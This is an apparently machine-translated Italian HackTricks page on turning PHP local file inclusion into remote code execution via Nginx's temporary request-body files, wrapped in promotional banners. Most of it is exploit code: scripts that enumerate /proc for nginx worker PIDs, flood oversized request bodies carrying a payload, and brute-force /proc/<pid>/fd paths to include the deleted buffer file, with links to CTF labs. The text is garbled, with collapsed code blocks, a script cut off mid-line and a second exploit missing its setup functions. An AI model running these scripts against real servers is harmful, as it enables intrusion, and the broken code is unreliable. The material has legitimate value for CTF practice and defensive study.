# LFI2RCE tramite file temporanei Nginx
{% hint style="success" %}
Impara e pratica Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Impara e pratica Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Supporta HackTricks
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos di github.
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
[**WhiteIntel**](https://whiteintel.io) è un motore di ricerca alimentato dal **dark-web** che offre funzionalità **gratuite** per controllare se un'azienda o i suoi clienti sono stati **compromessi** da **malware rubatori**.
Il loro obiettivo principale di WhiteIntel è combattere il furto di account e gli attacchi ransomware derivanti da malware che rubano informazioni.
Puoi controllare il loro sito web e provare il loro motore **gratuitamente** su:
{% embed url="https://whiteintel.io" %}
***
## Configurazione vulnerabile
[**Esempio da https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
* Codice PHP:
\`\`\`\`h\`
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (eliminato) ... \`\`\` Nota: Non si può includere direttamente \`/proc/34/fd/15\` in questo esempio poiché la funzione \`include\` di PHP risolverebbe il percorso in \`/var/lib/nginx/body/0000001368 (eliminato)\` che non esiste nel filesystem. Questa piccola restrizione può fortunatamente essere aggirata da qualche indirectione come: \`/proc/self/fd/34/../../../34/fd/15\` che eseguirà infine il contenuto del file eliminato \`/var/lib/nginx/body/0000001368\`. ## Exploit Completo \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # sfrutta l'inclusione di file locale PHP (LFI) tramite l'assistenza al buffering del corpo del client di nginx # vedi https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ per dettagli URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # trova i processi worker di nginx r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] worker nginx trovato: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # carica un grande corpo client per forzare nginx a creare un /var/lib/nginx/body/$X def uploader(): print('\[+] avvio uploader') while not done: requests.get(URL, data=' //'
```
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
except:
pass
```
```python
def send_payload_worker(requests_session):
while True:
send_payload(requests_session)
def send_payload_multiprocess(requests_session):
# Usa tutte le CPU per inviare il payload come corpo della richiesta per Nginx
for _ in range(multiprocessing.cpu_count()):
p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
p.start()
def generate_random_path_prefix(nginx_pids):
# Questo metodo crea un percorso da un numero casuale di componenti del percorso ProcFS.
# Un percorso generato apparirà come /proc//cwd/proc//root/proc//root
path = ""
component_num = random.randint(0, 10)
for _ in range(component_num):
pid = random.choice(nginx_pids)
if random.randint(0, 1) == 0:
path += f"/proc/{pid}/cwd"
else:
path += f"/proc/{pid}/root"
return path
def read_file(requests_session, nginx_pid, fd, nginx_pids):
nginx_pid_list = list(nginx_pids)
while True:
path = generate_random_path_prefix(nginx_pid_list)
path += f"/proc/{nginx_pid}/fd/{fd}"
try:
d = requests_session.get(SERVER + f"/?action=include&file={path}").text
except:
continue
# I flag sono formattati come hxp{}
if "hxp" in d:
print("Flag trovata! ")
print(d)
def read_file_worker(requests_session, nginx_pid, nginx_pids):
# Scansiona i FD di Nginx tra 10 - 45 in un ciclo.
# Poiché i file e i socket continuano a chiudersi - è molto comune che il FD del corpo della richiesta si apra all'interno di questo intervallo
for fd in range(10, 45):
thread = threading.Thread(target=read_file, args=(requests_session, nginx_pid, fd, nginx_pids))
thread.start()
def read_file_multiprocess(requests_session, nginx_pids):
for nginx_pid in nginx_pids:
p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
p.start()
if __name__ == "__main__":
print('\[DEBUG] Creazione della sessione di richieste')
requests_session = create_requests_session()
print('\[DEBUG] Ottenimento dei pid di Nginx')
nginx_pids = get_nginx_pids(requests_session)
print(f'\[DEBUG] Pid di Nginx: {nginx_pids}')
print('\[DEBUG] Inizio dell\'invio del payload')
send_payload_multiprocess(requests_session)
print('\[DEBUG] Inizio dei lettori di fd')
read_file_multiprocess(requests_session, nginx_pids)
```
```
## Labs
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
## References
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
### [WhiteIntel](https://whiteintel.io)
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
You can check their website and try their engine for **free** at:
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
```
.png)
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training GCP Red Team Expert (GRTE)**.png)